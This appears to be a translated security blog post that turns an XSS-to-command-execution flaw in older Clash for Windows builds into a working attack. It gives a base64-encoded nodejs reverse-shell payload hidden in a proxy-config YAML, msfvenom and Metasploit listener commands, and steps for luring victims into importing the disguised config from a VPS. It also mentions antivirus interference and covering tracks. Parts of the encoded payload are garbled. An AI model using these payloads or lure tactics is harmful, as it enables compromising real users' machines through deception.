0x00 Vulnerability Overview
On around February 25, or was it the night of the 24th, a vulnerability was discovered in Clash, where XSS led to command execution.https://github.com/Fndroid/clash_for_windows_pkg
As a result, what I saw online was just a method to open the calculator; is that really a vulnerability exploitation??? I must admit that most security testers, in order to release first-hand information, start to attract attention without truly understanding the issue, which I find really frustrating. If you want to be a hacker, please endure loneliness and focus solely on your goals rather than the flowers and grass that you pass by.
Therefore, I have created a vulnerability exploitation here, which is to expand the harm reproduction—using Clash RCE to go online.This article references the operations of Master Bao, hereby declared!
0x01 Impact Scope
Clash Windows version below 0.19.08, it has already been updated, just install 0.19.10
0x02 POC and Principle Analysis
Typical XSS payload—img tag combined with onerror event, calling a system command eval function, executingcalc.exe
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>0x03 Vulnerability Reproduction and Exploitation
Basic Reproduction
I feel that reproducing it as simply as others online, merely popping up a calculator, is true reproduction.
It’s just knowing that a vulnerability exists and directly using someone else’s POC to hit it once. But still, it didn’t get exploited. How to exploit this vulnerability to expand harm and even let the other party go online requires some research.
Advanced Reproduction and Exploitation—First Learn a Few Knowledge Points
These knowledge points may not be understood by most people, requiring a lot of development experience in various aspects. Of course, you don’t need to go too deep into development, just have a rough understanding, at least be able to understand what it does and what framework it is written in. Penetration testing must have a development foundation, and a development foundation requires long-term in-depth research and study.
1. Clash software is developed based on Electron, using Node.js at the bottom.
2. Details tag and ontoggle event
When <details> element is opened or closed, execute JavaScript:
<details ontoggle="myFunction()">3. Atob method and btoa method
atob() ————————————> Decodes a base-64 encoded string.
btoa() ————————————> Encodes base-64.
This is just like Go language’sItoA,atob() isascii to base64, and vice versa
4. MSFvenom can search for payloads
msfvenom --list payload | grep windows/x645. MSF generates online payload
Apps developed based on Electron and NW.js (here the app broadly includes both PC and mobile) that have XSS vulnerabilities can use this MSF payload
msfvenom -p nodejs/shell_reverse_tcp LHOST=MyIP LPORT=65500 -f raw -o payload.js
6. Copy the payload down and then base64 encrypt it
IChmdW5jdGlvbigpeyB2YXIgcmVxdWlyZSA9IGdsb2JhbC5yZXF1aXJlIHx8IGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUuY29uc3RydWN0b3IuX2xvYWQ7IGlmICghcmVxdWlyZSkgcmV0dXJuOyB2YXIgY21kID0gKGdsb2JhbC5wcm9jZXNzLnBsYXRmb3JtLm1hdGNoKC9ed2luL2kpKSA/ICJjbWQiIDogIi9iaW4vc2giOyB2YXIgbmV0ID0gcmVxdWlyZSgibmV0IiksIGNwID0gcmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLCB1dGlsID0gcmVxdWlyZSgidXRpbCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50Ihhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh0LnBpcGUoc2guc3RkaW4pOyBpZiAodHlwZW9mIHV0aWwucHVtcCA9PT0gInVuZGVmaW5lZCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbigiZXJyb3IiLCBmdW5jdGlvbihlcnJvcikgeyBjb3VudGVyKys7IGlmKGNvdW50ZXI8PSAxMCl7IHNldFRpbWVvdXQoZnVuY3Rpb24oKSB7IFN0YWdlclJlcGVhdCgpO30sIDUqMTAwMCk7IH0gZWxzZSBwcm9jZXNzLmV4aXQoKTsgfSk7IH0gU3RhZ2VyUmVwZWF0KCk7IH0pKCk70x04 Exploiting the Vulnerability—Constructing Payloads and Going Online
After analyzing the previous knowledge points, you should be able to understand the key codes here. So what do the other codes before and after mean?
Actually, it’s just a proxy file in YAML, you can add some for social engineering, deceiving others, top-level social engineering.
Moreover, this also involves the idea of file upload; sometimes, using a one-liner upload simply cannot parse and link to the ant sword, but casually adding 100 lines of garbage characters can connect just fine.
This may be because the image file size is too small, triggering traffic monitoring or code-level WAF leading to upload failure. The same principle applies here; it can achieve the effect of obfuscation and deceiving users, and also increase fault tolerance.
proxies:
- { name: 🇷🇺Large bandwidth reserved, type: ss, server: xxxxxx.tpxx.top, port: 11901, cipher: chacxxy1305, password: cdx2cxx91b, udp: true }
...
...
...
-
name: <details ontoggle=eval(atob('KGZ1bmN0aW9uKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL1d3aW4vaSkpID8gImNtZCIgOiAiL2Jpbi9zaCI7IHZhciBuZXQgPSByZXF1aXJlKCJuZXQiKSwgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksIHV0aWwgPSByZXF1aXJlKCJ1dGlsIiksIHNoID0gY3Auc3Bhd24oY21kLCBbXSk7IHZhciBjbGllbnQgPSB0aGlzOyB2YXIgY291bnRlcj0wOyBmdW5jdGlvbiBTdGFnZXJSZXBlYXQoKXsgY2xpZW50LnNvY2tldCA9IG5ldC5jb25uZWN0KDY1NTAhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgeyBjbGllbnQuc29ja2V0LnBpcGUoc2guc3RkaW4pOyBpZiAodHlwZW9mIHV0aWwucHVtcCA9PT0gInVuZGVmaW5lZCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbigiZXJyb3IiLCBmdW5jdGlvbihlcnJvcikgeyBjb3VudGVyKys7IGlmKGNvdW50ZXI8PSAxMCl7IHNldFRpbWVvdXQoZnVuY3Rpb24oKSB7IFN0YWdlclJlcGVhdCgpO30sIDUqMTAwMCk7IH0gZWxzZSBwcm9jZXNzLmV4aXQoKTsgfSk7IH0gU3RhZ2VyUmVwZWF0KCk7IH0pKCk7')); open=></details>
type: select
proxies:
- Bee c
- autoselect
rules:
- 'DOMAIN,asdadsa.asdasd.asd.top,DIRECT'
....
....
....1. Save the constructed payload to a file, such asBeeNest.yaml, put it on a public VPS, under the guise of: latest configuration file, node updates, fast speed, whatever NEWX CLASS, just top-level social engineering to induce others to download:
2. The victim downloads and imports this file
3. The MSF on the public VPS starts listening, and since it’s Ubuntu, don’t forget toufw allow 65500 to allow the port to be open.
After my multiple tests, I have tried various listening methods, but the returning sessions are often easily dropped.The reason is actually very simple; it’s being intercepted by Huorong.
handler -H 0.0.0.0 -P 65500 -p php/meterpreter/reverse_tcp
#############################################################
use exploit/multi/handler
set payload nodejs/shell_reverse_tcp
#############################################################
nc -lvvp 65500
Actually, despite the interception by Huorong, just clicking multiple times will eventually lead to success. However, it’s very unstable; when I receive it, it might drop directly.
Alright, turn off Huorong and everything will be fine
Destroy the VPS and run away
0x05 Summary
1. As long as it is an app developed based on Electron and NW.js (here the app broadly includes both PC and mobile), if there is an XSS, you can use this MSF payload and corresponding listening method
msfvenom -p nodejs/shell_reverse_tcp LHOST=MyIP LPORT=65500 -f raw -o payload.js
################################################################################
use exploit/multi/handler
set payload nodejs/shell_reverse_tcp
set lhost <IP>
set lport <port>2. Huorong is great, actually, you can create a method to bypass Huorong, but I won’t research that for now.
3. In researching how to let the other party go online, the key is the understanding of the development of Clash software. Therefore, in penetration testing, having a development foundation is essential; I do not ask you to be extremely strong in development, but at least you should be able to recognize and relate known knowledge to relevant penetration operations, which requires time, experience accumulation, and continuous expansion of knowledge breadth. Perhaps this is the inner strength of a martial arts master; even with the unique sword of Dugu, without sufficient inner strength, one cannot achieve the highest realm of having no sword in hand but a sword in heart.